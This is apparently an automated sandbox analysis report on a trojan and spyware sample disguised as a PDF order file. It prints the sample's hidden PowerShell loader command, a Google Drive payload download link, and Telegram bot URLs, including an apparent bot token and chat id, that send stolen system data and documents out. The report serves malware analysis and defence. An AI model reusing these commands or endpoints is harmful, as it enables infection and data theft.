            Source: powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.2037160905.0000000005101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20a
            Source: msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897
            Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000006.00000002.2957521886.00000000212C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000006.00000002.2957521886.00000000212BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000006.00000002.2943801242.0000000000BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000006.00000002.2943801242.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2956435223.0000000020750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3
            Source: msiexec.exe, 00000006.00000002.2943801242.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2172281229.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/1
            Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2943801242.0000000000C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download
            Source: msiexec.exe, 00000006.00000002.2943801242.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2172281229.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/s
            Source: powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000006.00000002.2957521886.0000000021150000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000006.00000002.2957521886.0000000021150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
            Source: msiexec.exe, 00000006.00000002.2957521886.000000002117A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
            Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2959617752.0000000022382000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000223D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000224A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: msiexec.exe, 00000006.00000002.2959617752.00000000221B9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022480000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022388000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002235D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: msiexec.exe, 00000006.00000002.2959617752.0000000022382000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000223D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000224A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: msiexec.exe, 00000006.00000002.2959617752.00000000221B9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022480000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022388000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002235D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2957521886.00000000212E6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000006.00000002.2957521886.00000000212F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49806 version: TLS 1.2
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405339

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Order requirements CIF Greece_pdf.exe
            Source: initial sampleStatic PE information: Filename: Order requirements CIF Greece_pdf.exe
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeFile created: C:\Windows\SuperpraisedJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeFile created: C:\Windows\Superpraised\haanlatterensJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeFile created: C:\Windows\SysWOW64\narrowness.iniJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04FDE2601_2_04FDE260
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_00ED50616_2_00ED5061
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_00ED22406_2_00ED2240
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_00ED4DC06_2_00ED4DC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_00ED35306_2_00ED3530
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_00EDBEB16_2_00EDBEB1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F7C1476_2_20F7C147
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F7D2786_2_20F7D278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F753696_2_20F75369
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F7C4686_2_20F7C468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F7C7386_2_20F7C738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F7E9886_2_20F7E988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F7CA086_2_20F7CA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F7CCD86_2_20F7CCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F73E136_2_20F73E13
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F7CFAB6_2_20F7CFAB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F771186_2_20F77118
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F739CD6_2_20F739CD
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F73AA16_2_20F73AA1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EBB206_2_236EBB20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EA6E86_2_236EA6E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EAD406_2_236EAD40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EF9F06_2_236EF9F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E5B696_2_236E5B69
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E5B786_2_236E5B78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E87486_2_236E8748
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E27586_2_236E2758
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E57206_2_236E5720
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EE3206_2_236EE320
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E23006_2_236E2300
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E571F6_2_236E571F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EBB1B6_2_236EBB1B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EE3106_2_236EE310
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E8FF86_2_236E8FF8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E5FCF6_2_236E5FCF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E5FD06_2_236E5FD0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E8BA06_2_236E8BA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EE7A16_2_236EE7A1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E2BB06_2_236E2BB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EE7B06_2_236EE7B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E4E6F6_2_236E4E6F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EDE7F6_2_236EDE7F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E4E706_2_236E4E70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E7A406_2_236E7A40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E1A506_2_236E1A50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E9E3A6_2_236E9E3A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E9E386_2_236E9E38
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E4A186_2_236E4A18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E4A176_2_236E4A17
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E22F96_2_236E22F9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E82F06_2_236E82F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E52C86_2_236E52C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E52C76_2_236E52C7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EA6D96_2_236EA6D9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E1EA86_2_236E1EA8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E1E986_2_236E1E98
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E7E986_2_236E7E98
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EA2926_2_236EA292
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EA2906_2_236EA290
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EDE906_2_236EDE90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E41686_2_236E4168
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E41676_2_236E4167
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EF5606_2_236EF560
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E0D486_2_236E0D48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E0D476_2_236E0D47
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EF55B6_2_236EF55B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EAD376_2_236EAD37
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E3D0F6_2_236E3D0F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E3D106_2_236E3D10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E15E86_2_236E15E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E75E86_2_236E75E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E99E26_2_236E99E2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E99E06_2_236E99E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E15F86_2_236E15F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E45C06_2_236E45C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EF9DF6_2_236EF9DF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E11A06_2_236E11A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E45BF6_2_236E45BF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E95886_2_236E9588
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E119F6_2_236E119F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E71926_2_236E7192
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E71906_2_236E7190
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E34606_2_236E3460
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E00406_2_236E0040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EEC406_2_236EEC40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E64286_2_236E6428
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EEC336_2_236EEC33
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E30086_2_236E3008
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E00066_2_236E0006
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E08E16_2_236E08E1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E08F06_2_236E08F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EF0C06_2_236EF0C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236EF0D06_2_236EF0D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236ED0A86_2_236ED0A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E38B86_2_236E38B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E04986_2_236E0498
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236ED0986_2_236ED098
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236E04976_2_236E0497
            Source: Order requirements CIF Greece_pdf.exeStatic PE information: invalid certificate
            Source: Order requirements CIF Greece_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/13@5/5
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004045EA
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeFile created: C:\Users\user\AppData\Roaming\skittagetJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nso3C58.tmpJump to behavior
            Source: Order requirements CIF Greece_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Order requirements CIF Greece_pdf.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeFile read: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: textinputframework.dllJump to behavior
